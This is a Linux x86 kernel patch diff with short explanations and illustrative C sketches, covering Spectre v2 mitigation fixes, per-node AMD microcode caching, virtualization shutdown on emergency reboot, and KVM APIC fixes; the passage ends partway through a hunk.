+@@ -144,9 +144,17 @@ void __init check_bugs(void)
+ 	 * have unknown values. AMD64_LS_CFG MSR is cached in the early AMD
+ 	 * init code as it is not enumerated and depends on the family.
+ 	 */
+-	if (boot_cpu_has(X86_FEATURE_MSR_SPEC_CTRL))
++	if (cpu_feature_enabled(X86_FEATURE_MSR_SPEC_CTRL)) {
+ 		rdmsrl(MSR_IA32_SPEC_CTRL, x86_spec_ctrl_base);
+ 
++		/*
++		 * Previously running kernel (kexec), may have some controls
++		 * turned ON. Clear them and let the mitigations setup below
++		 * rediscover them based on configuration.
++		 */
++		x86_spec_ctrl_base &= ~SPEC_CTRL_MITIGATIONS_MASK;
++	}
++
+ 	/* Select the proper CPU mitigations before patching alternatives: */
+ 	spectre_v1_select_mitigation();
+ 	spectre_v2_select_mitigation();
+@@ -1095,14 +1103,18 @@ spectre_v2_parse_user_cmdline(void)
+ 	return SPECTRE_V2_USER_CMD_AUTO;
+ }
+ 
+-static inline bool spectre_v2_in_ibrs_mode(enum spectre_v2_mitigation mode)
++static inline bool spectre_v2_in_eibrs_mode(enum spectre_v2_mitigation mode)
+ {
+-	return mode == SPECTRE_V2_IBRS ||
+-	       mode == SPECTRE_V2_EIBRS ||
++	return mode == SPECTRE_V2_EIBRS ||
+ 	       mode == SPECTRE_V2_EIBRS_RETPOLINE ||
+ 	       mode == SPECTRE_V2_EIBRS_LFENCE;
+ }
+ 
++static inline bool spectre_v2_in_ibrs_mode(enum spectre_v2_mitigation mode)
++{
++	return spectre_v2_in_eibrs_mode(mode) || mode == SPECTRE_V2_IBRS;
++}
++
+ static void __init
+ spectre_v2_user_select_mitigation(void)
+ {
+@@ -1165,12 +1177,19 @@ spectre_v2_user_select_mitigation(void)
+ 	}
+ 
+ 	/*
+-	 * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,
+-	 * STIBP is not required.
++	 * If no STIBP, enhanced IBRS is enabled, or SMT impossible, STIBP
++	 * is not required.
++	 *
++	 * Enhanced IBRS also protects against cross-thread branch target
++	 * injection in user-mode as the IBRS bit remains always set which
++	 * implicitly enables cross-thread protections.  However, in legacy IBRS
++	 * mode, the IBRS bit is set only on kernel entry and cleared on return
++	 * to userspace. This disables the implicit cross-thread protection,
++	 * so allow for STIBP to be selected in that case.
+ 	 */
+ 	if (!boot_cpu_has(X86_FEATURE_STIBP) ||
+ 	    !smt_possible ||
+-	    spectre_v2_in_ibrs_mode(spectre_v2_enabled))
++	    spectre_v2_in_eibrs_mode(spectre_v2_enabled))
+ 		return;
+ 
+ 	/*
+@@ -2297,7 +2316,7 @@ static ssize_t mmio_stale_data_show_state(char *buf)
+ 
+ static char *stibp_state(void)
+ {
+-	if (spectre_v2_in_ibrs_mode(spectre_v2_enabled))
++	if (spectre_v2_in_eibrs_mode(spectre_v2_enabled))
+ 		return "";
+ 
+ 	switch (spectre_v2_user_stibp) {
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index e80572b674b7a..c34bdba57993a 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -2311,30 +2311,45 @@ void cpu_init_secondary(void)
+ #endif
+ 
+ #ifdef CONFIG_MICROCODE_LATE_LOADING
+-/*
++/**
++ * store_cpu_caps() - Store a snapshot of CPU capabilities
++ * @curr_info: Pointer where to store it
++ *
++ * Returns: None
++ */
++void store_cpu_caps(struct cpuinfo_x86 *curr_info)
++{
++	/* Reload CPUID max function as it might've changed. */
++	curr_info->cpuid_level = cpuid_eax(0);
++
++	/* Copy all capability leafs and pick up the synthetic ones. */
++	memcpy(&curr_info->x86_capability, &boot_cpu_data.x86_capability,
++	       sizeof(curr_info->x86_capability));
++
++	/* Get the hardware CPUID leafs */
++	get_cpu_cap(curr_info);
++}
++
++/**
++ * microcode_check() - Check if any CPU capabilities changed after an update.
++ * @prev_info:	CPU capabilities stored before an update.
++ *
+  * The microcode loader calls this upon late microcode load to recheck features,
+  * only when microcode has been updated. Caller holds microcode_mutex and CPU
+  * hotplug lock.
++ *
++ * Return: None
+  */
+-void microcode_check(void)
++void microcode_check(struct cpuinfo_x86 *prev_info)
+ {
+-	struct cpuinfo_x86 info;
++	struct cpuinfo_x86 curr_info;
+ 
+ 	perf_check_microcode();
+ 
+-	/* Reload CPUID max function as it might've changed. */
+-	info.cpuid_level = cpuid_eax(0);
+-
+-	/*
+-	 * Copy all capability leafs to pick up the synthetic ones so that
+-	 * memcmp() below doesn't fail on that. The ones coming from CPUID will
+-	 * get overwritten in get_cpu_cap().
+-	 */
+-	memcpy(&info.x86_capability, &boot_cpu_data.x86_capability, sizeof(info.x86_capability));
+-
+-	get_cpu_cap(&info);
++	store_cpu_caps(&curr_info);
+ 
+-	if (!memcmp(&info.x86_capability, &boot_cpu_data.x86_capability, sizeof(info.x86_capability)))
++	if (!memcmp(&prev_info->x86_capability, &curr_info.x86_capability,
++		    sizeof(prev_info->x86_capability)))
+ 		return;
+ 
+ 	pr_warn("x86/CPU: CPU features have changed after loading microcode, but might not take effect.\n");
+diff --git a/arch/x86/kernel/cpu/microcode/amd.c b/arch/x86/kernel/cpu/microcode/amd.c
+index 3a35dec3ec550..461e45d85add9 100644
+--- a/arch/x86/kernel/cpu/microcode/amd.c
++++ b/arch/x86/kernel/cpu/microcode/amd.c
+@@ -55,7 +55,9 @@ struct cont_desc {
+ };
+ 
+ static u32 ucode_new_rev;
+-static u8 amd_ucode_patch[PATCH_MAX_SIZE];
++
++/* One blob per node. */
++static u8 amd_ucode_patch[MAX_NUMNODES][PATCH_MAX_SIZE];
+ 
+ /*
+  * Microcode patch container file is prepended to the initrd in cpio
+@@ -428,7 +430,7 @@ apply_microcode_early_amd(u32 cpuid_1_eax, void *ucode, size_t size, bool save_p
+ 	patch	= (u8 (*)[PATCH_MAX_SIZE])__pa_nodebug(&amd_ucode_patch);
+ #else
+ 	new_rev = &ucode_new_rev;
+-	patch	= &amd_ucode_patch;
++	patch	= &amd_ucode_patch[0];
+ #endif
+ 
+ 	desc.cpuid_1_eax = cpuid_1_eax;
+@@ -553,8 +555,7 @@ void load_ucode_amd_ap(unsigned int cpuid_1_eax)
+ 	apply_microcode_early_amd(cpuid_1_eax, cp.data, cp.size, false);
+ }
+ 
+-static enum ucode_state
+-load_microcode_amd(bool save, u8 family, const u8 *data, size_t size);
++static enum ucode_state load_microcode_amd(u8 family, const u8 *data, size_t size);
+ 
+ int __init save_microcode_in_initrd_amd(unsigned int cpuid_1_eax)
+ {
+@@ -572,19 +573,19 @@ int __init save_microcode_in_initrd_amd(unsigned int cpuid_1_eax)
+ 	if (!desc.mc)
+ 		return -EINVAL;
+ 
+-	ret = load_microcode_amd(true, x86_family(cpuid_1_eax), desc.data, desc.size);
++	ret = load_microcode_amd(x86_family(cpuid_1_eax), desc.data, desc.size);
+ 	if (ret > UCODE_UPDATED)
+ 		return -EINVAL;
+ 
+ 	return 0;
+ }
+ 
+-void reload_ucode_amd(void)
++void reload_ucode_amd(unsigned int cpu)
+ {
+-	struct microcode_amd *mc;
+ 	u32 rev, dummy __always_unused;
++	struct microcode_amd *mc;
+ 
+-	mc = (struct microcode_amd *)amd_ucode_patch;
++	mc = (struct microcode_amd *)amd_ucode_patch[cpu_to_node(cpu)];
+ 
+ 	rdmsr(MSR_AMD64_PATCH_LEVEL, rev, dummy);
+ 
+@@ -850,9 +851,10 @@ static enum ucode_state __load_microcode_amd(u8 family, const u8 *data,
+ 	return UCODE_OK;
+ }
+ 
+-static enum ucode_state
+-load_microcode_amd(bool save, u8 family, const u8 *data, size_t size)
++static enum ucode_state load_microcode_amd(u8 family, const u8 *data, size_t size)
+ {
++	struct cpuinfo_x86 *c;
++	unsigned int nid, cpu;
+ 	struct ucode_patch *p;
+ 	enum ucode_state ret;
+ 
+@@ -865,22 +867,22 @@ load_microcode_amd(bool save, u8 family, const u8 *data, size_t size)
+ 		return ret;
+ 	}
+ 
+-	p = find_patch(0);
+-	if (!p) {
+-		return ret;
+-	} else {
+-		if (boot_cpu_data.microcode >= p->patch_id)
+-			return ret;
++	for_each_node(nid) {
++		cpu = cpumask_first(cpumask_of_node(nid));
++		c = &cpu_data(cpu);
+ 
+-		ret = UCODE_NEW;
+-	}
++		p = find_patch(cpu);
++		if (!p)
++			continue;
+ 
+-	/* save BSP's matching patch for early load */
+-	if (!save)
+-		return ret;
++		if (c->microcode >= p->patch_id)
++			continue;
+ 
+-	memset(amd_ucode_patch, 0, PATCH_MAX_SIZE);
+-	memcpy(amd_ucode_patch, p->data, min_t(u32, p->size, PATCH_MAX_SIZE));
++		ret = UCODE_NEW;
++
++		memset(&amd_ucode_patch[nid], 0, PATCH_MAX_SIZE);
++		memcpy(&amd_ucode_patch[nid], p->data, min_t(u32, p->size, PATCH_MAX_SIZE));
++	}
+ 
+ 	return ret;
+ }
+@@ -906,12 +908,11 @@ static enum ucode_state request_microcode_amd(int cpu, struct device *device,
+ {
+ 	char fw_name[36] = "amd-ucode/microcode_amd.bin";
+ 	struct cpuinfo_x86 *c = &cpu_data(cpu);
+-	bool bsp = c->cpu_index == boot_cpu_data.cpu_index;
+ 	enum ucode_state ret = UCODE_NFOUND;
+ 	const struct firmware *fw;
+ 
+ 	/* reload ucode container only on the boot cpu */
+-	if (!refresh_fw || !bsp)
++	if (!refresh_fw)
+ 		return UCODE_OK;
+ 
+ 	if (c->x86 >= 0x15)
+@@ -926,7 +927,7 @@ static enum ucode_state request_microcode_amd(int cpu, struct device *device,
+ 	if (!verify_container(fw->data, fw->size, false))
+ 		goto fw_release;
+ 
+-	ret = load_microcode_amd(bsp, c->x86, fw->data, fw->size);
++	ret = load_microcode_amd(c->x86, fw->data, fw->size);
+ 
+  fw_release:
+ 	release_firmware(fw);
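
The amd.c changes above replace the single boot-time patch buffer with one blob per NUMA node, indexed via cpu_to_node(), so systems with per-node CPU revisions can cache a matching patch for each node. A minimal userspace sketch of the indexing scheme; the node count, the cpu_to_node() mapping and the size limit here are stand-ins, not the kernel's values:

#include <stdio.h>
#include <string.h>

#define MAX_NODES      8      /* stand-in for MAX_NUMNODES */
#define PATCH_MAX_SIZE 4096   /* stand-in for the kernel's limit */

/* One blob per node, mirroring amd_ucode_patch[MAX_NUMNODES][...]. */
static unsigned char patch_cache[MAX_NODES][PATCH_MAX_SIZE];

/* Hypothetical topology helper; the kernel uses cpu_to_node(). */
static int cpu_to_node(int cpu) { return cpu / 4; }

static void save_patch(int node, const void *data, size_t size)
{
	if (size > PATCH_MAX_SIZE)
		size = PATCH_MAX_SIZE;
	memset(patch_cache[node], 0, PATCH_MAX_SIZE);
	memcpy(patch_cache[node], data, size);
}

static const unsigned char *patch_for_cpu(int cpu)
{
	return patch_cache[cpu_to_node(cpu)];
}

int main(void)
{
	save_patch(1, "blob-for-node-1", 16);
	printf("cpu 5 -> %s\n", patch_for_cpu(5)); /* cpu 5 sits on node 1 */
	return 0;
}
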
+diff --git a/arch/x86/kernel/cpu/microcode/core.c b/arch/x86/kernel/cpu/microcode/core.c
+index 6a41cee242f6d..9e02648e51d18 100644
+--- a/arch/x86/kernel/cpu/microcode/core.c
++++ b/arch/x86/kernel/cpu/microcode/core.c
+@@ -298,7 +298,7 @@ struct cpio_data find_microcode_in_initrd(const char *path, bool use_pa)
+ #endif
+ }
+ 
+-void reload_early_microcode(void)
++void reload_early_microcode(unsigned int cpu)
+ {
+ 	int vendor, family;
+ 
+@@ -312,7 +312,7 @@ void reload_early_microcode(void)
+ 		break;
+ 	case X86_VENDOR_AMD:
+ 		if (family >= 0x10)
+-			reload_ucode_amd();
++			reload_ucode_amd(cpu);
+ 		break;
+ 	default:
+ 		break;
+@@ -492,6 +492,7 @@ wait_for_siblings:
+ static int microcode_reload_late(void)
+ {
+ 	int old = boot_cpu_data.microcode, ret;
++	struct cpuinfo_x86 prev_info;
+ 
+ 	pr_err("Attempting late microcode loading - it is dangerous and taints the kernel.\n");
+ 	pr_err("You should switch to early loading, if possible.\n");
+@@ -499,12 +500,21 @@ static int microcode_reload_late(void)
+ 	atomic_set(&late_cpus_in,  0);
+ 	atomic_set(&late_cpus_out, 0);
+ 
+-	ret = stop_machine_cpuslocked(__reload_late, NULL, cpu_online_mask);
+-	if (ret == 0)
+-		microcode_check();
++	/*
++	 * Take a snapshot before the microcode update in order to compare and
++	 * check whether any bits changed after an update.
++	 */
++	store_cpu_caps(&prev_info);
+ 
+-	pr_info("Reload completed, microcode revision: 0x%x -> 0x%x\n",
+-		old, boot_cpu_data.microcode);
++	ret = stop_machine_cpuslocked(__reload_late, NULL, cpu_online_mask);
++	if (!ret) {
++		pr_info("Reload succeeded, microcode revision: 0x%x -> 0x%x\n",
++			old, boot_cpu_data.microcode);
++		microcode_check(&prev_info);
++	} else {
++		pr_info("Reload failed, current microcode revision: 0x%x\n",
++			boot_cpu_data.microcode);
++	}
+ 
+ 	return ret;
+ }
+@@ -685,7 +695,7 @@ void microcode_bsp_resume(void)
+ 	if (uci->valid && uci->mc)
+ 		microcode_ops->apply_microcode(cpu);
+ 	else if (!uci->mc)
+-		reload_early_microcode();
++		reload_early_microcode(cpu);
+ }
+ 
+ static struct syscore_ops mc_syscore_ops = {
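
microcode_reload_late() now snapshots the CPU capability words before the update and lets microcode_check() diff them afterwards. The pattern is capture, mutate, compare; a hedged sketch with invented capability values rather than the kernel's store_cpu_caps():

#include <stdio.h>
#include <string.h>

struct cpu_caps { unsigned int words[4]; };

/* Stand-in for reading x86_capability; the values are invented. */
static void store_cpu_caps(struct cpu_caps *c)
{
	for (int i = 0; i < 4; i++)
		c->words[i] = 0xdeadbeefu ^ i;
}

/* Pretend the microcode update flipped one feature bit. */
static void reload_microcode(struct cpu_caps *c)
{
	c->words[2] |= 1u << 5;
}

int main(void)
{
	struct cpu_caps prev, cur;

	store_cpu_caps(&prev);	/* snapshot before the update */
	cur = prev;
	reload_microcode(&cur);	/* the risky operation */

	if (memcmp(prev.words, cur.words, sizeof(prev.words)))
		printf("CPU features changed after loading microcode\n");
	return 0;
}
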
+diff --git a/arch/x86/kernel/crash.c b/arch/x86/kernel/crash.c
+index 305514431f26e..cdd92ab43cda4 100644
+--- a/arch/x86/kernel/crash.c
++++ b/arch/x86/kernel/crash.c
+@@ -37,7 +37,6 @@
+ #include <linux/kdebug.h>
+ #include <asm/cpu.h>
+ #include <asm/reboot.h>
+-#include <asm/virtext.h>
+ #include <asm/intel_pt.h>
+ #include <asm/crash.h>
+ #include <asm/cmdline.h>
+@@ -81,15 +80,6 @@ static void kdump_nmi_callback(int cpu, struct pt_regs *regs)
+ 	 */
+ 	cpu_crash_vmclear_loaded_vmcss();
+ 
+-	/* Disable VMX or SVM if needed.
+-	 *
+-	 * We need to disable virtualization on all CPUs.
+-	 * Having VMX or SVM enabled on any CPU may break rebooting
+-	 * after the kdump kernel has finished its task.
+-	 */
+-	cpu_emergency_vmxoff();
+-	cpu_emergency_svm_disable();
+-
+ 	/*
+ 	 * Disable Intel PT to stop its logging
+ 	 */
+@@ -148,12 +138,7 @@ void native_machine_crash_shutdown(struct pt_regs *regs)
+ 	 */
+ 	cpu_crash_vmclear_loaded_vmcss();
+ 
+-	/* Booting kdump kernel with VMX or SVM enabled won't work,
+-	 * because (among other limitations) we can't disable paging
+-	 * with the virt flags.
+-	 */
+-	cpu_emergency_vmxoff();
+-	cpu_emergency_svm_disable();
++	cpu_emergency_disable_virtualization();
+ 
+ 	/*
+ 	 * Disable Intel PT to stop its logging
+diff --git a/arch/x86/kernel/fpu/context.h b/arch/x86/kernel/fpu/context.h
+index 958accf2ccf07..9fcfa5c4dad79 100644
+--- a/arch/x86/kernel/fpu/context.h
++++ b/arch/x86/kernel/fpu/context.h
+@@ -57,7 +57,7 @@ static inline void fpregs_restore_userregs(void)
+ 	struct fpu *fpu = &current->thread.fpu;
+ 	int cpu = smp_processor_id();
+ 
+-	if (WARN_ON_ONCE(current->flags & PF_KTHREAD))
++	if (WARN_ON_ONCE(current->flags & (PF_KTHREAD | PF_IO_WORKER)))
+ 		return;
+ 
+ 	if (!fpregs_state_valid(fpu, cpu)) {
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index 9baa89a8877d0..caf33486dc5ee 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -426,7 +426,7 @@ void kernel_fpu_begin_mask(unsigned int kfpu_mask)
+ 
+ 	this_cpu_write(in_kernel_fpu, true);
+ 
+-	if (!(current->flags & PF_KTHREAD) &&
++	if (!(current->flags & (PF_KTHREAD | PF_IO_WORKER)) &&
+ 	    !test_thread_flag(TIF_NEED_FPU_LOAD)) {
+ 		set_thread_flag(TIF_NEED_FPU_LOAD);
+ 		save_fpregs_to_fpstate(&current->thread.fpu);
+@@ -853,12 +853,12 @@ int fpu__exception_code(struct fpu *fpu, int trap_nr)
+  * Initialize register state that may prevent from entering low-power idle.
+  * This function will be invoked from the cpuidle driver only when needed.
+  */
+-void fpu_idle_fpregs(void)
++noinstr void fpu_idle_fpregs(void)
+ {
+ 	/* Note: AMX_TILE being enabled implies XGETBV1 support */
+ 	if (cpu_feature_enabled(X86_FEATURE_AMX_TILE) &&
+ 	    (xfeatures_in_use() & XFEATURE_MASK_XTILE)) {
+ 		tile_release();
+-		fpregs_deactivate(&current->thread.fpu);
++		__this_cpu_write(fpu_fpregs_owner_ctx, NULL);
+ 	}
+ }
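
Both FPU hunks widen the same guard from PF_KTHREAD to PF_KTHREAD | PF_IO_WORKER, since io_uring worker threads, like kthreads, never run user code with the FPU state in question. The combined test is a single mask, shown in a small sketch; the flag values mirror the kernel's but are only illustrative here:

#include <stdbool.h>
#include <stdio.h>

#define PF_IO_WORKER	0x00000010u
#define PF_KTHREAD	0x00200000u

/* True for tasks whose user FP registers must not be touched. */
static bool fpu_state_is_kernel_only(unsigned int flags)
{
	return flags & (PF_KTHREAD | PF_IO_WORKER);
}

int main(void)
{
	printf("%d %d %d\n",
	       fpu_state_is_kernel_only(PF_KTHREAD),	/* 1 */
	       fpu_state_is_kernel_only(PF_IO_WORKER),	/* 1 */
	       fpu_state_is_kernel_only(0));		/* 0 */
	return 0;
}
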
+diff --git a/arch/x86/kernel/kprobes/opt.c b/arch/x86/kernel/kprobes/opt.c
+index e57e07b0edb64..57b0037d0a996 100644
+--- a/arch/x86/kernel/kprobes/opt.c
++++ b/arch/x86/kernel/kprobes/opt.c
+@@ -46,8 +46,8 @@ unsigned long __recover_optprobed_insn(kprobe_opcode_t *buf, unsigned long addr)
+ 		/* This function only handles jump-optimized kprobe */
+ 		if (kp && kprobe_optimized(kp)) {
+ 			op = container_of(kp, struct optimized_kprobe, kp);
+-			/* If op->list is not empty, op is under optimizing */
+-			if (list_empty(&op->list))
++			/* If op is optimized or queued for unoptimization */
++			if (list_empty(&op->list) || optprobe_queued_unopt(op))
+ 				goto found;
+ 		}
+ 	}
+@@ -353,7 +353,7 @@ int arch_check_optimized_kprobe(struct optimized_kprobe *op)
+ 
+ 	for (i = 1; i < op->optinsn.size; i++) {
+ 		p = get_kprobe(op->kp.addr + i);
+-		if (p && !kprobe_disabled(p))
++		if (p && !kprobe_disarmed(p))
+ 			return -EEXIST;
+ 	}
+ 
+diff --git a/arch/x86/kernel/reboot.c b/arch/x86/kernel/reboot.c
+index c3636ea4aa71f..d03c551defccf 100644
+--- a/arch/x86/kernel/reboot.c
++++ b/arch/x86/kernel/reboot.c
+@@ -528,33 +528,29 @@ static inline void kb_wait(void)
+ 	}
+ }
+ 
+-static void vmxoff_nmi(int cpu, struct pt_regs *regs)
+-{
+-	cpu_emergency_vmxoff();
+-}
++static inline void nmi_shootdown_cpus_on_restart(void);
+ 
+-/* Use NMIs as IPIs to tell all CPUs to disable virtualization */
+-static void emergency_vmx_disable_all(void)
++static void emergency_reboot_disable_virtualization(void)
+ {
+ 	/* Just make sure we won't change CPUs while doing this */
+ 	local_irq_disable();
+ 
+ 	/*
+-	 * Disable VMX on all CPUs before rebooting, otherwise we risk hanging
+-	 * the machine, because the CPU blocks INIT when it's in VMX root.
++	 * Disable virtualization on all CPUs before rebooting to avoid hanging
++	 * the system, as VMX and SVM block INIT when running in the host.
+ 	 *
+ 	 * We can't take any locks and we may be on an inconsistent state, so
+-	 * use NMIs as IPIs to tell the other CPUs to exit VMX root and halt.
++	 * use NMIs as IPIs to tell the other CPUs to disable VMX/SVM and halt.
+ 	 *
+-	 * Do the NMI shootdown even if VMX if off on _this_ CPU, as that
+-	 * doesn't prevent a different CPU from being in VMX root operation.
++	 * Do the NMI shootdown even if virtualization is off on _this_ CPU, as
++	 * other CPUs may have virtualization enabled.
+ 	 */
+-	if (cpu_has_vmx()) {
+-		/* Safely force _this_ CPU out of VMX root operation. */
+-		__cpu_emergency_vmxoff();
++	if (cpu_has_vmx() || cpu_has_svm(NULL)) {
++		/* Safely force _this_ CPU out of VMX/SVM operation. */
++		cpu_emergency_disable_virtualization();
+ 
+-		/* Halt and exit VMX root operation on the other CPUs. */
+-		nmi_shootdown_cpus(vmxoff_nmi);
++		/* Disable VMX/SVM and halt on other CPUs. */
++		nmi_shootdown_cpus_on_restart();
+ 	}
+ }
+ 
+@@ -590,7 +586,7 @@ static void native_machine_emergency_restart(void)
+ 	unsigned short mode;
+ 
+ 	if (reboot_emergency)
+-		emergency_vmx_disable_all();
++		emergency_reboot_disable_virtualization();
+ 
+ 	tboot_shutdown(TB_SHUTDOWN_REBOOT);
+ 
+@@ -795,6 +791,17 @@ void machine_crash_shutdown(struct pt_regs *regs)
+ /* This is the CPU performing the emergency shutdown work. */
+ int crashing_cpu = -1;
+ 
++/*
++ * Disable virtualization, i.e. VMX or SVM, to ensure INIT is recognized during
++ * reboot.  VMX blocks INIT if the CPU is post-VMXON, and SVM blocks INIT if
++ * GIF=0, i.e. if the crash occurred between CLGI and STGI.
++ */
++void cpu_emergency_disable_virtualization(void)
++{
++	cpu_emergency_vmxoff();
++	cpu_emergency_svm_disable();
++}
++
+ #if defined(CONFIG_SMP)
+ 
+ static nmi_shootdown_cb shootdown_callback;
+@@ -817,7 +824,14 @@ static int crash_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 		return NMI_HANDLED;
+ 	local_irq_disable();
+ 
+-	shootdown_callback(cpu, regs);
++	if (shootdown_callback)
++		shootdown_callback(cpu, regs);
++
++	/*
++	 * Prepare the CPU for reboot _after_ invoking the callback so that the
++	 * callback can safely use virtualization instructions, e.g. VMCLEAR.
++	 */
++	cpu_emergency_disable_virtualization();
+ 
+ 	atomic_dec(&waiting_for_crash_ipi);
+ 	/* Assume hlt works */
+@@ -828,18 +842,32 @@ static int crash_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 	return NMI_HANDLED;
+ }
+ 
+-/*
+- * Halt all other CPUs, calling the specified function on each of them
++/**
++ * nmi_shootdown_cpus - Stop other CPUs via NMI
++ * @callback:	Optional callback to be invoked from the NMI handler
++ *
++ * The NMI handler on the remote CPUs invokes @callback, if not
++ * NULL, first and then disables virtualization to ensure that
++ * INIT is recognized during reboot.
+  *
+- * This function can be used to halt all other CPUs on crash
+- * or emergency reboot time. The function passed as parameter
+- * will be called inside a NMI handler on all CPUs.
++ * nmi_shootdown_cpus() can only be invoked once. After the first
++ * invocation all other CPUs are stuck in crash_nmi_callback() and
++ * cannot respond to a second NMI.
+  */
+ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ {
+ 	unsigned long msecs;
++
+ 	local_irq_disable();
+ 
++	/*
++	 * Avoid certain doom if a shootdown already occurred; re-registering
++	 * the NMI handler will cause list corruption, modifying the callback
++	 * will do who knows what, etc...
++	 */
++	if (WARN_ON_ONCE(crash_ipi_issued))
++		return;
++
+ 	/* Make a note of crashing cpu. Will be used in NMI callback. */
+ 	crashing_cpu = safe_smp_processor_id();
+ 
+@@ -867,7 +895,17 @@ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ 		msecs--;
+ 	}
+ 
+-	/* Leave the nmi callback set */
++	/*
++	 * Leave the nmi callback set; shootdown is a one-time thing.  Clearing
++	 * the callback could result in a NULL pointer dereference if a CPU
++	 * (finally) responds after the timeout expires.
++	 */
++}
++
++static inline void nmi_shootdown_cpus_on_restart(void)
++{
++	if (!crash_ipi_issued)
++		nmi_shootdown_cpus(NULL);
+ }
+ 
+ /*
+@@ -897,6 +935,8 @@ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ 	/* No other CPUs to shoot down */
+ }
+ 
++static inline void nmi_shootdown_cpus_on_restart(void) { }
++
+ void run_crash_ipi_callback(struct pt_regs *regs)
+ {
+ }
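
The WARN_ON_ONCE(crash_ipi_issued) early return makes nmi_shootdown_cpus() explicitly one-shot: calling it twice would re-register the NMI handler and corrupt the handler list. The guard is the usual latch-a-flag pattern, sketched here with a C11 compare-and-swap rather than the kernel's flag-with-interrupts-disabled approach:

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

static atomic_bool shootdown_issued;

/* Returns 0 on the first invocation, -1 on every later one. */
static int nmi_shootdown_once(void)
{
	bool expected = false;

	if (!atomic_compare_exchange_strong(&shootdown_issued,
					    &expected, true)) {
		fprintf(stderr, "shootdown already issued, refusing\n");
		return -1;
	}
	/* ... register the handler, send NMIs, wait for CPUs ... */
	return 0;
}

int main(void)
{
	printf("%d\n", nmi_shootdown_once());	/* 0 */
	printf("%d\n", nmi_shootdown_once());	/* -1 */
	return 0;
}
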
+diff --git a/arch/x86/kernel/signal.c b/arch/x86/kernel/signal.c
+index 9c7265b524c73..82c562e2cc982 100644
+--- a/arch/x86/kernel/signal.c
++++ b/arch/x86/kernel/signal.c
+@@ -923,7 +923,7 @@ static bool strict_sigaltstack_size __ro_after_init = false;
+ 
+ static int __init strict_sas_size(char *arg)
+ {
+-	return kstrtobool(arg, &strict_sigaltstack_size);
++	return kstrtobool(arg, &strict_sigaltstack_size) == 0;
+ }
+ __setup("strict_sas_size", strict_sas_size);
+ 
+diff --git a/arch/x86/kernel/smp.c b/arch/x86/kernel/smp.c
+index 06db901fabe8e..375b33ecafa27 100644
+--- a/arch/x86/kernel/smp.c
++++ b/arch/x86/kernel/smp.c
+@@ -32,7 +32,7 @@
+ #include <asm/mce.h>
+ #include <asm/trace/irq_vectors.h>
+ #include <asm/kexec.h>
+-#include <asm/virtext.h>
++#include <asm/reboot.h>
+ 
+ /*
+  *	Some notes on x86 processor bugs affecting SMP operation:
+@@ -122,7 +122,7 @@ static int smp_stop_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 	if (raw_smp_processor_id() == atomic_read(&stopping_cpu))
+ 		return NMI_HANDLED;
+ 
+-	cpu_emergency_vmxoff();
++	cpu_emergency_disable_virtualization();
+ 	stop_this_cpu(NULL);
+ 
+ 	return NMI_HANDLED;
+@@ -134,7 +134,7 @@ static int smp_stop_nmi_callback(unsigned int val, struct pt_regs *regs)
+ DEFINE_IDTENTRY_SYSVEC(sysvec_reboot)
+ {
+ 	ack_APIC_irq();
+-	cpu_emergency_vmxoff();
++	cpu_emergency_disable_virtualization();
+ 	stop_this_cpu(NULL);
+ }
+ 
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index bf5ce862c4daf..68eba393842f5 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2072,10 +2072,18 @@ static void kvm_lapic_xapic_id_updated(struct kvm_lapic *apic)
+ {
+ 	struct kvm *kvm = apic->vcpu->kvm;
+ 
++	if (!kvm_apic_hw_enabled(apic))
++		return;
++
+ 	if (KVM_BUG_ON(apic_x2apic_mode(apic), kvm))
+ 		return;
+ 
+-	if (kvm_xapic_id(apic) == apic->vcpu->vcpu_id)
++	/*
++	 * Deliberately truncate the vCPU ID when detecting a modified APIC ID
++	 * to avoid false positives if the vCPU ID, i.e. x2APIC ID, is a 32-bit
++	 * value.
++	 */
++	if (kvm_xapic_id(apic) == (u8)apic->vcpu->vcpu_id)
+ 		return;
+ 
+ 	kvm_set_apicv_inhibit(apic->vcpu->kvm, APICV_INHIBIT_REASON_APIC_ID_MODIFIED);
+@@ -2219,10 +2227,14 @@ static int kvm_lapic_reg_write(struct kvm_lapic *apic, u32 reg, u32 val)
+ 		break;
+ 
+ 	case APIC_SELF_IPI:
+-		if (apic_x2apic_mode(apic))
+-			kvm_apic_send_ipi(apic, APIC_DEST_SELF | (val & APIC_VECTOR_MASK), 0);
+-		else
++		/*
++		 * Self-IPI exists only when x2APIC is enabled.  Bits 7:0 hold
++		 * the vector, everything else is reserved.
++		 */
++		if (!apic_x2apic_mode(apic) || (val & ~APIC_VECTOR_MASK))
+ 			ret = 1;
++		else
++			kvm_apic_send_ipi(apic, APIC_DEST_SELF | val, 0);
+ 		break;
+ 	default:
+ 		ret = 1;
+@@ -2284,23 +2296,18 @@ void kvm_apic_write_nodecode(struct kvm_vcpu *vcpu, u32 offset)
+ 	struct kvm_lapic *apic = vcpu->arch.apic;
+ 	u64 val;
+ 
+-	if (apic_x2apic_mode(apic)) {
+-		if (KVM_BUG_ON(kvm_lapic_msr_read(apic, offset, &val), vcpu->kvm))
+-			return;
+-	} else {
+-		val = kvm_lapic_get_reg(apic, offset);
+-	}
+-
+ 	/*
+ 	 * ICR is a single 64-bit register when x2APIC is enabled.  For legacy
+ 	 * xAPIC, ICR writes need to go down the common (slightly slower) path
+ 	 * to get the upper half from ICR2.
+ 	 */
+ 	if (apic_x2apic_mode(apic) && offset == APIC_ICR) {
++		val = kvm_lapic_get_reg64(apic, APIC_ICR);
+ 		kvm_apic_send_ipi(apic, (u32)val, (u32)(val >> 32));
+ 		trace_kvm_apic_write(APIC_ICR, val);
+ 	} else {
+ 		/* TODO: optimize to just emulate side effect w/o one more write */
